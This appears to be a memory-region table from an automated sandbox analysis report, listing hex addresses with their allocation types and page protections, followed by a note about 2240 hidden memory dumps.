26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
4A15000
heap
page read and write
222000
direct allocation
page execute and read and write
13E000
heap
page read and write
32B6000
heap
page read and write
F0000
trusted library allocation
page read and write
7DF0000
heap
page read and write
32C3000
heap
page read and write
2E00000
heap
page read and write
815000
trusted library allocation
page read and write
2E18000
heap
page read and write
5E1E000
stack
page read and write
222000
direct allocation
page execute and read and write
78D0000
unkown
page read and write
32AE000
heap
page read and write
3299000
heap
page read and write
3C70000
unkown
page readonly
3C10000
unkown
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
24E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
23B0000
unkown
page read and write
8540000
heap
page read and write
236000
heap
page read and write
26E0000
unkown
page read and write
3299000
heap
page read and write
1B20000
trusted library allocation
page read and write
24F7000
trusted library allocation
page read and write
50DE000
heap
page read and write
1B40000
unkown
page read and write
32C1000
heap
page read and write
2503000
trusted library allocation
page read and write
7B7000
heap
page read and write
340000
heap
page read and write
68000
system
page execute and read and write
284B000
unkown
page read and write
2BB0000
unkown
page read and write
3C50000
unkown
page readonly
88C000
heap
page read and write
217F000
stack
page read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
3600000
trusted library allocation
page read and write
26F0000
unkown
page read and write
4A73000
heap
page read and write
170000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
1B0000
trusted library allocation
page read and write
356E000
heap
page read and write
3EEC000
unkown
page read and write
62E000
stack
page read and write
2440000
unkown
page read and write
1B20000
trusted library allocation
page read and write
26F0000
unkown
page read and write
32B6000
heap
page read and write
43F6000
heap
page execute and read and write
33B000
unkown
page read and write
1F0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
1D60000
heap
page read and write
2BB0000
unkown
page read and write
70000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
2BC0000
heap
page read and write
1A0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
2420000
unkown
page read and write
1A0000
trusted library allocation
page read and write
43F0000
heap
page execute and read and write
263F000
stack
page read and write
50C3000
heap
page read and write
351B000
heap
page read and write
70000
trusted library allocation
page read and write
1C4E000
stack
page read and write
23D0000
unkown
page read and write
401E000
stack
page read and write
2A0000
heap
page read and write
39B0000
unkown
page read and write
222000
direct allocation
page execute and read and write
ED000
stack
page read and write
1ED000
trusted library allocation
page execute and read and write
4E0000
heap
page read and write
3AF0000
unkown
page read and write
170000
heap
page read and write
2BB0000
unkown
page read and write
170000
trusted library allocation
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
1D2B000
heap
page read and write
23C0000
unkown
page read and write
D0000
trusted library allocation
page read and write
85F0000
heap
page read and write
6B90000
heap
page read and write
1F1000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
32AE000
heap
page read and write
705E000
stack
page read and write
D90000
heap
page execute and read and write
26F0000
unkown
page read and write
22A1000
trusted library allocation
page read and write
26F0000
unkown
page read and write
32AE000
heap
page read and write
333F000
stack
page read and write
222000
direct allocation
page execute and read and write
39B0000
unkown
page read and write
2D82000
heap
page read and write
2F1C000
stack
page read and write
2FD000
stack
page read and write
F0000
trusted library allocation
page read and write
4020000
unkown
page readonly
32C3000
heap
page read and write
2BB0000
unkown
page read and write
23C0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
33B1000
trusted library allocation
page read and write
340000
heap
page read and write
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
6A3000
heap
page read and write
218000
heap
page read and write
32B8000
heap
page read and write
1F1000
direct allocation
page execute and read and write
7979000
unkown
page read and write
1A0000
trusted library allocation
page read and write
27F0000
unkown
page read and write
2820000
unkown
page read and write
170000
trusted library allocation
page read and write
30E0000
heap
page read and write
18A000
stack
page read and write
32AE000
heap
page read and write
F0000
trusted library allocation
page read and write
2440000
unkown
page read and write
222000
direct allocation
page execute and read and write
1CA000
heap
page read and write
2440000
unkown
page read and write
32AE000
heap
page read and write
1F0000
trusted library allocation
page read and write
6DAC000
unkown
page read and write
2200000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
2ACA000
stack
page read and write
27F0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2720000
unkown
page read and write
34ED000
heap
page read and write
222000
direct allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
68E000
heap
page read and write
1B83000
heap
page read and write
232F000
stack
page read and write
2BB0000
unkown
page read and write
2440000
unkown
page read and write
5DEF000
stack
page read and write
26F0000
unkown
page read and write
6A000
system
page execute and read and write
10000
heap
page read and write
2114000
heap
page read and write
2A40000
unkown
page readonly
179000
stack
page read and write
F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
70000
trusted library allocation
page read and write
26F0000
unkown
page read and write
222000
direct allocation
page execute and read and write
204E000
stack
page read and write
3299000
heap
page read and write
3D0000
heap
page read and write
10000
heap
page read and write
26F0000
unkown
page read and write
107000
heap
page read and write
26F0000
unkown
page read and write
2BB0000
unkown
page read and write
25E0000
unkown
page read and write
5E04000
heap
page read and write
2670000
heap
page read and write
1A0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
6F73000
heap
page read and write
26E0000
unkown
page read and write
26F0000
unkown
page read and write
70000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
1DBF000
stack
page read and write
270000
trusted library allocation
page read and write
26F0000
unkown
page read and write
23B0000
unkown
page read and write
2A0000
heap
page read and write
664000
heap
page read and write
2BB0000
unkown
page read and write
464000
heap
page read and write
4A1B000
heap
page read and write
699000
heap
page read and write
10000
heap
page read and write
F0000
trusted library allocation
page read and write
300000
unkown
page read and write
80E000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
500000
heap
page read and write
222000
direct allocation
page execute and read and write
2BBE000
stack
page read and write
2440000
unkown
page read and write
4EEC000
heap
page read and write
7960000
unkown
page read and write
26E0000
unkown
page read and write
32B6000
heap
page read and write
33B000
heap
page read and write
270000
trusted library allocation
page read and write
B4E000
stack
page read and write
2440000
unkown
page read and write
2E11000
heap
page read and write
270000
trusted library allocation
page read and write
3569000
trusted library allocation
page read and write
454E000
stack
page read and write
32B8000
heap
page read and write
E0000
unkown
page read and write
3ECC000
trusted library allocation
page read and write
20000
heap
page read and write
26E0000
unkown
page read and write
1B20000
trusted library allocation
page read and write
32C3000
heap
page read and write
150000
heap
page read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
1A0000
unkown
page readonly
3299000
heap
page read and write
460000
heap
page execute and read and write
21CE000
stack
page read and write
32AE000
heap
page read and write
13C000
stack
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
3569000
heap
page read and write
26F0000
unkown
page read and write
3517000
heap
page read and write
43C0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
2DD000
heap
page read and write
F0000
trusted library allocation
page read and write
41A0000
heap
page read and write
2E18000
heap
page read and write
420F000
stack
page read and write
4A1C000
heap
page read and write
270000
trusted library allocation
page read and write
170000
stack
page read and write
2D95000
heap
page read and write
260A000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
5E0000
heap
page read and write
647000
heap
page read and write
1F0000
trusted library allocation
page read and write
32B8000
heap
page read and write
21F0000
heap
page read and write
32B6000
heap
page read and write
32B1000
heap
page read and write
2BB0000
unkown
page read and write
2607000
unkown
page read and write
32AE000
heap
page read and write
4B2000
heap
page read and write
3E6000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2E9000
heap
page read and write
20A0000
heap
page read and write
2440000
unkown
page read and write
4BAA000
heap
page read and write
2C0000
heap
page read and write
89B000
heap
page read and write
970000
trusted library allocation
page read and write
2820000
unkown
page read and write
C1000
system
page execute and read and write
2FE000
heap
page read and write
222000
direct allocation
page execute and read and write
2968000
stack
page read and write
270000
trusted library allocation
page read and write
1D7000
trusted library allocation
page execute and read and write
26E0000
unkown
page read and write
3734000
heap
page read and write
4030000
heap
page read and write
32B6000
heap
page read and write
1A0000
trusted library allocation
page read and write
32B6000
heap
page read and write
797B000
unkown
page read and write
1A0000
trusted library allocation
page read and write
26F0000
unkown
page read and write
3C2000
trusted library allocation
page read and write
89B000
heap
page read and write
698000
heap
page read and write
1B40000
unkown
page read and write
682F000
stack
page read and write
1A0000
unkown
page readonly
2D70000
unkown
page read and write
6B99000
heap
page read and write
2440000
unkown
page read and write
1F6000
heap
page read and write
44FE000
stack
page read and write
2AF1000
unkown
page read and write
3C90000
unkown
page readonly
4040000
unkown
page readonly
176000
heap
page read and write
3D17000
unkown
page read and write
28FE000
trusted library allocation
page read and write
F0E000
stack
page read and write
1E20000
heap
page read and write
1F1000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
68CC000
stack
page read and write
32C3000
heap
page read and write
26E0000
unkown
page read and write
1A0000
trusted library allocation
page read and write
1BE000
heap
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
26F0000
unkown
page read and write
362F000
stack
page read and write
1A0000
trusted library allocation
page read and write
5DC2000
heap
page read and write
3210000
heap
page read and write
69F0000
heap
page read and write
5C0000
heap
page read and write
2CD0000
unkown
page read and write
2968000
stack
page read and write
2BB0000
unkown
page read and write
4F38000
heap
page read and write
3BC0000
unkown
page read and write
222000
direct allocation
page execute and read and write
2C3E000
stack
page read and write
3AA1000
unkown
page read and write
26E0000
unkown
page read and write
242F000
stack
page read and write
10000
heap
page read and write
6C90000
heap
page read and write
1F0000
heap
page read and write
1CF5000
heap
page read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
2593000
trusted library allocation
page read and write
2440000
unkown
page read and write
2440000
unkown
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
27F0000
unkown
page read and write
1A0000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
46A000
heap
page read and write
39A0000
unkown
page read and write
694000
heap
page read and write
1B7000
heap
page read and write
26E0000
unkown
page read and write
289D000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
32B6000
heap
page read and write
3505000
heap
page read and write
16B000
stack
page read and write
32B1000
heap
page read and write
3760000
unkown
page read and write
33C000
unkown
page read and write
2F9000
heap
page read and write
222000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
693000
heap
page read and write
2BB0000
unkown
page read and write
170000
trusted library allocation
page read and write
2440000
unkown
page read and write
7960000
unkown
page read and write
2820000
unkown
page read and write
4E9F000
stack
page read and write
23CB000
unkown
page read and write
4800000
trusted library allocation
page read and write
10000
heap
page read and write
604000
heap
page read and write
222000
direct allocation
page execute and read and write
3680000
heap
page read and write
ACE000
stack
page read and write
693000
heap
page read and write
2BB0000
unkown
page read and write
5095000
heap
page read and write
2B0000
unkown
page read and write
472E000
stack
page read and write
2BB0000
unkown
page read and write
88000
system
page execute and read and write
32B8000
heap
page read and write
2BB0000
unkown
page read and write
2E14000
heap
page read and write
8303000
unkown
page read and write
26E0000
unkown
page read and write
216000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
4658000
unkown
page read and write
69F0000
heap
page read and write
26E0000
unkown
page read and write
32B1000
heap
page read and write
2BB0000
unkown
page read and write
3604000
trusted library allocation
page read and write
57B000
heap
page read and write
2440000
unkown
page read and write
6C1000
heap
page read and write
38B0000
unkown
page read and write
26E0000
unkown
page read and write
4F7000
heap
page read and write
1F1000
direct allocation
page execute and read and write
3A0000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2DC9000
heap
page read and write
1F1000
direct allocation
page execute and read and write
234E000
unkown
page read and write
2BB0000
unkown
page read and write
3BF0000
unkown
page read and write
2EF000
heap
page read and write
5134000
heap
page read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
F0000
trusted library allocation
page read and write
4200000
unkown
page read and write
2132000
heap
page read and write
4B3E000
stack
page read and write
1F1000
direct allocation
page execute and read and write
2AE0000
unkown
page read and write
32B8000
heap
page read and write
2BB0000
unkown
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
170000
trusted library allocation
page read and write
4BB9000
heap
page read and write
32B8000
heap
page read and write
1D60000
heap
page read and write
170000
stack
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
1F1000
page execute and read and write
ACD1000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
1CFA000
unkown
page read and write
F2DE000
trusted library allocation
page read and write
492B000
stack
page read and write
2E14000
heap
page read and write
2BB0000
unkown
page read and write
222000
direct allocation
page execute and read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
32B1000
heap
page read and write
26E0000
unkown
page read and write
32B1000
heap
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
410000
heap
page read and write
A7E000
stack
page read and write
3FAF000
stack
page read and write
170000
trusted library allocation
page read and write
19C000
stack
page read and write
2D95000
heap
page read and write
41E0000
trusted library allocation
page read and write
81000
system
page execute and read and write
170000
trusted library allocation
page read and write
2440000
unkown
page read and write
34ED000
heap
page read and write
6E00000
heap
page read and write
1F1000
direct allocation
page execute and read and write
212E000
stack
page read and write
2F0B000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
38F0000
heap
page read and write
300000
heap
page read and write
2380000
unkown
page read and write
2BB0000
unkown
page read and write
32E000
heap
page read and write
450000
trusted library allocation
page read and write
2E24000
heap
page read and write
2BB0000
unkown
page read and write
89000
stack
page read and write
2440000
unkown
page read and write
F0000
trusted library allocation
page read and write
900000
trusted library allocation
page read and write
2DC9000
heap
page read and write
1FA000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
6F73000
heap
page read and write
3E0000
heap
page read and write
222000
direct allocation
page execute and read and write
27F0000
unkown
page read and write
2BB0000
unkown
page read and write
3E98000
unkown
page read and write
B30000
heap
page read and write
28B0000
unkown
page read and write
88000
system
page execute and read and write
29F000
heap
page read and write
79A5000
unkown
page read and write
222000
direct allocation
page execute and read and write
3474000
heap
page read and write
1F1000
direct allocation
page execute and read and write
4A01000
heap
page read and write
3485000
heap
page read and write
627000
heap
page read and write
352000
heap
page read and write
70000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
466000
heap
page execute and read and write
6760000
stack
page read and write
2440000
unkown
page read and write
3CC0000
unkown
page read and write
2D99000
heap
page read and write
26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
6699000
stack
page read and write
3F4000
heap
page read and write
4260000
trusted library allocation
page read and write
20000
unkown
page readonly
2BB0000
unkown
page read and write
26F0000
unkown
page read and write
2BB0000
unkown
page read and write
27D000
stack
page read and write
C3000
trusted library allocation
page execute and read and write
82C3000
unkown
page read and write
60EE000
stack
page read and write
1F0000
trusted library allocation
page read and write
1B65000
heap
page read and write
270000
trusted library allocation
page read and write
32B6000
heap
page read and write
222000
direct allocation
page execute and read and write
3ED0000
unkown
page read and write
222000
direct allocation
page execute and read and write
C90000
heap
page read and write
7200000
heap
page read and write
F0000
trusted library allocation
page read and write
1D6000
heap
page read and write
319000
trusted library allocation
page read and write
53C000
stack
page read and write
2AF1000
unkown
page read and write
3C10000
unkown
page read and write
2BB0000
unkown
page read and write
5FA0000
heap
page read and write
10000
heap
page read and write
23FD000
stack
page read and write
1F0000
trusted library allocation
page read and write
6A2000
heap
page read and write
676B000
stack
page read and write
1D10000
unkown
page readonly
450000
trusted library allocation
page execute and read and write
3299000
heap
page read and write
2440000
unkown
page read and write
3507000
heap
page read and write
4658000
unkown
page read and write
2440000
unkown
page read and write
170000
trusted library allocation
page read and write
295E000
stack
page read and write
1A0000
trusted library allocation
page read and write
31D000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
4960000
trusted library allocation
page read and write
73A0000
heap
page read and write
903000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
1BC000
stack
page read and write
10000
heap
page read and write
4CEE000
stack
page read and write
70000
trusted library allocation
page read and write
4A5F000
stack
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
32C3000
heap
page read and write
26F0000
unkown
page read and write
32B1000
heap
page read and write
298000
heap
page read and write
380000
heap
page read and write
234E000
stack
page read and write
32C3000
heap
page read and write
2DBB000
heap
page read and write
285E000
trusted library allocation
page read and write
26F0000
unkown
page read and write
1B60000
heap
page read and write
4200000
unkown
page read and write
6C1000
heap
page read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
270000
trusted library allocation
page read and write
1BE0000
unkown
page readonly
371F000
heap
page read and write
1D24000
heap
page read and write
1DE000
heap
page read and write
300000
heap
page read and write
281F000
trusted library allocation
page read and write
433C000
stack
page read and write
1B80000
heap
page read and write
49CD000
stack
page read and write
3BB0000
unkown
page read and write
3BD0000
unkown
page read and write
10000
heap
page read and write
382B000
stack
page read and write
705E000
stack
page read and write
170000
trusted library allocation
page read and write
415E000
stack
page read and write
4260000
trusted library allocation
page read and write
657D000
stack
page read and write
88C000
heap
page read and write
1F0000
trusted library allocation
page read and write
100000
heap
page read and write
1E0000
trusted library allocation
page read and write
65FF000
stack
page read and write
226B000
heap
page read and write
3C00000
unkown
page read and write
A70000
heap
page read and write
170000
trusted library allocation
page read and write
4260000
trusted library allocation
page read and write
2B0000
heap
page read and write
5F0000
remote allocation
page read and write
222000
direct allocation
page execute and read and write
3B2D000
stack
page read and write
1F1000
direct allocation
page execute and read and write
5E7F000
stack
page read and write
6F50000
heap
page read and write
2440000
unkown
page read and write
17C000
stack
page read and write
411C000
stack
page read and write
1F1000
direct allocation
page execute and read and write
32B6000
heap
page read and write
820000
trusted library allocation
page read and write
32E000
heap
page read and write
32B8000
heap
page read and write
2BB0000
unkown
page read and write
6E00000
heap
page read and write
43D0000
trusted library allocation
page read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
38CC000
stack
page read and write
7170000
heap
page read and write
1F1000
direct allocation
page execute and read and write
3C0000
heap
page read and write
1AD000
trusted library allocation
page execute and read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
3E82000
unkown
page read and write
222000
direct allocation
page execute and read and write
433F000
stack
page read and write
28D0000
unkown
page read and write
70000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
1A0000
trusted library allocation
page read and write
86000
system
page execute and read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
26E0000
unkown
page read and write
70000
trusted library allocation
page read and write
2EE000
heap
page read and write
230000
heap
page execute and read and write
28B0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
4800000
trusted library allocation
page read and write
73C5000
heap
page read and write
26F0000
unkown
page read and write
36AD000
stack
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
2E14000
heap
page read and write
300000
heap
page read and write
2440000
unkown
page read and write
241D000
stack
page read and write
170000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
7970000
unkown
page read and write
300000
unkown
page read and write
4EF9000
heap
page read and write
400000
unkown
page readonly
3299000
heap
page read and write
1F1000
direct allocation
page execute and read and write
1D20000
unkown
page readonly
2BB0000
unkown
page read and write
222000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
7E0000
heap
page read and write
27DF000
trusted library allocation
page read and write
70000
trusted library allocation
page read and write
4EE0000
heap
page read and write
45DE000
stack
page read and write
4F17000
heap
page read and write
2BB0000
unkown
page read and write
2907000
trusted library allocation
page read and write
2440000
unkown
page read and write
4470000
trusted library allocation
page read and write
4A9B000
heap
page read and write
8199000
unkown
page read and write
32B1000
heap
page read and write
692000
heap
page read and write
1A0000
trusted library allocation
page read and write
E1000
system
page execute and read and write
32B8000
heap
page read and write
26E0000
unkown
page read and write
C8000
system
page execute and read and write
62B0000
heap
page read and write
3BFF000
stack
page read and write
32B6000
heap
page read and write
2B00000
unkown
page readonly
26E0000
unkown
page read and write
3E7F000
stack
page read and write
2D82000
heap
page read and write
2B0000
unkown
page read and write
64F0000
heap
page read and write
32B8000
heap
page read and write
32AE000
heap
page read and write
2BB0000
unkown
page read and write
446E000
stack
page read and write
2DA6000
heap
page read and write
4050000
unkown
page readonly
2D9E000
heap
page read and write
2820000
unkown
page read and write
2550000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
280000
heap
page read and write
2F0000
heap
page read and write
170000
trusted library allocation
page read and write
1DBF000
stack
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
5DEE000
stack
page read and write | page guard
32C3000
heap
page read and write
3299000
heap
page read and write
32B1000
heap
page read and write
1F1000
direct allocation
page execute and read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
170000
trusted library allocation
page read and write
F0000
trusted library allocation
page read and write
32B8000
heap
page read and write
5F8000
heap
page read and write
2F0000
heap
page read and write
B6D1000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
88E000
heap
page read and write
2D7E000
heap
page read and write
222000
direct allocation
page execute and read and write
6C1000
heap
page read and write
511E000
heap
page read and write
1B83000
heap
page read and write
1A0000
trusted library allocation
page read and write
550000
heap
page read and write
1F1000
direct allocation
page execute and read and write
5ED9000
stack
page read and write
32B6000
heap
page read and write
27F0000
unkown
page read and write
1A0000
trusted library allocation
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
480000
heap
page read and write
C0D1000
trusted library allocation
page read and write
32C3000
heap
page read and write
4F03000
heap
page read and write
3B00000
unkown
page read and write
3D38000
unkown
page read and write
26E0000
unkown
page read and write
540000
remote allocation
page read and write
640000
heap
page read and write
32AE000
heap
page read and write
1F1000
direct allocation
page execute and read and write
5AC000
heap
page read and write
6D7000
heap
page read and write
2A40000
unkown
page readonly
32B8000
heap
page read and write
3C2D000
stack
page read and write
3F70000
unkown
page execute read
26E0000
unkown
page read and write
21CF000
stack
page read and write
2440000
unkown
page read and write
4ADE000
stack
page read and write
2440000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2D9E000
heap
page read and write
32B1000
heap
page read and write
3D3F000
stack
page read and write
6F55000
heap
page read and write
2440000
unkown
page read and write
12C000
stack
page read and write
1A0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
4260000
trusted library allocation
page read and write
32AE000
heap
page read and write
222000
direct allocation
page execute and read and write
1F1000
direct allocation
page execute and read and write
2AC0000
stack
page read and write
2BB0000
unkown
page read and write
32AE000
heap
page read and write
1F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
217F000
stack
page read and write
28B0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
2BB0000
unkown
page read and write
222000
direct allocation
page execute and read and write
222000
direct allocation
page execute and read and write
1A0000
trusted library allocation
page read and write
69A000
heap
page read and write
1F0000
trusted library allocation
page read and write
1F1000
direct allocation
page execute and read and write
4800000
trusted library allocation
page read and write
26E0000
unkown
page read and write
2BB0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3D10000
unkown
page read and write
46BD000
stack
page read and write
6C1000
heap
page read and write
669B000
stack
page read and write
622E000
stack
page read and write
3990000
unkown
page readonly
6220000
heap
page read and write
32AE000
heap
page read and write
6220000
heap
page read and write
818B000
unkown
page read and write
FC000
stack
page read and write
8383000
unkown
page read and write
33CE000
stack
page read and write
1F1000
direct allocation
page execute and read and write
684000
heap
page read and write
2440000
unkown
page read and write
4A1B000
heap
page read and write
4A01000
heap
page read and write
10000
heap
page read and write
11441000
trusted library allocation
page read and write
447000
heap
page read and write
3E82000
unkown
page read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
31E000
heap
page read and write
26F0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
3A80000
unkown
page execute and read and write
47FF000
stack
page read and write
26E0000
unkown
page read and write
2F6000
heap
page read and write
456A000
stack
page read and write
270000
trusted library allocation
page read and write
26F0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
5AB000
heap
page read and write
26E0000
unkown
page read and write
530000
heap
page read and write
26E0000
unkown
page read and write
222000
direct allocation
page execute and read and write
70000
trusted library allocation
page read and write
21E5000
unkown
page read and write
3541000
trusted library allocation
page read and write
350000
heap
page read and write
6A8000
heap
page read and write
7280000
unkown
page read and write
26E0000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
284000
trusted library allocation
page read and write
39C0000
unkown
page read and write
26E0000
unkown
page read and write
3310000
heap
page read and write
260E000
stack
page read and write
2607000
unkown
page read and write
6C8E000
stack
page read and write
170000
trusted library allocation
page read and write
26F0000
unkown
page read and write
1D42000
heap
page read and write
298000
heap
page read and write
1F0000
trusted library allocation
page read and write
32B8000
heap
page read and write
21E5000
unkown
page read and write
1A0000
trusted library allocation
page read and write
26E0000
unkown
page read and write
2507000
trusted library allocation
page read and write
2440000
unkown
page read and write
6A7000
heap
page read and write
816000
heap
page read and write
1F0000
trusted library allocation
page read and write
7440000
heap
page read and write
8284000
unkown
page read and write
70000
trusted library allocation
page read and write
5080000
heap
page read and write
5CEE000
stack
page read and write
1F0000
trusted library allocation
page read and write
3A0000
trusted library allocation
page execute and read and write
20A000
trusted library allocation
page execute and read and write
32C3000
heap
page read and write
3299000
heap
page read and write
DC000
stack
page read and write
26E0000
unkown
page read and write
1F0000
trusted library allocation
page read and write
222000
direct allocation
page execute and read and write
4B9E000
stack
page read and write
5D5E000
stack
page read and write
2190000
heap
page read and write
26E0000
unkown
page read and write
4650000
heap
page read and write
1A0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
4D3E000
stack
page read and write | page guard
2440000
unkown
page read and write
3B92000
stack
page read and write
2BB0000
unkown
page read and write
33E000
heap
page read and write
1C20000
heap
page read and write
2A5000
heap
page read and write
5DA4000
heap
page read and write
3D00000
unkown
page readonly
222000
direct allocation
page execute and read and write
356E000
heap
page read and write
2430000
unkown
page read and write
2440000
unkown
page read and write
26E0000
unkown
page read and write
6CD1000
trusted library allocation
page read and write
10000
heap
page read and write
26E0000
unkown
page read and write
2440000
unkown
page read and write
69F4000
heap
page read and write
5EFE000
stack
page read and write
1D0000
heap
page read and write
5ED9000
stack
page read and write
21C000
stack
page read and write
1F1000
direct allocation
page execute and read and write
818B000
unkown
page read and write
1F1000
direct allocation
page execute and read and write
4F50000
heap
page read and write
2440000
unkown
page read and write
2D90000
heap
page read and write
5050000
heap
page read and write
65B000
heap
page read and write
5E08000
stack
page read and write
356E000
heap
page read and write
3AF0000
unkown
page read and write
26E0000
unkown
page read and write
2C0000
heap
page read and write
26E0000
unkown
page read and write
32AE000
heap
page read and write
222000
direct allocation
page execute and read and write
2C5F000
stack
page read and write
667000
heap
page read and write
F92000
unkown
page execute read
4B5E000
stack
page read and write
2F7000
heap
page read and write
1F1000
direct allocation
page execute and read and write
A10000
trusted library allocation
page read and write
26E0000
unkown
page read and write
26E0000
unkown
page read and write
270000
trusted library allocation
page read and write
692000
heap
page read and write
82C3000
unkown
page read and write
81C3000
unkown
page read and write
40D8000
stack
page read and write
3EFE000
unkown
page read and write
32B8000
heap
page read and write
There are 2240 hidden memdumps, click here to show them.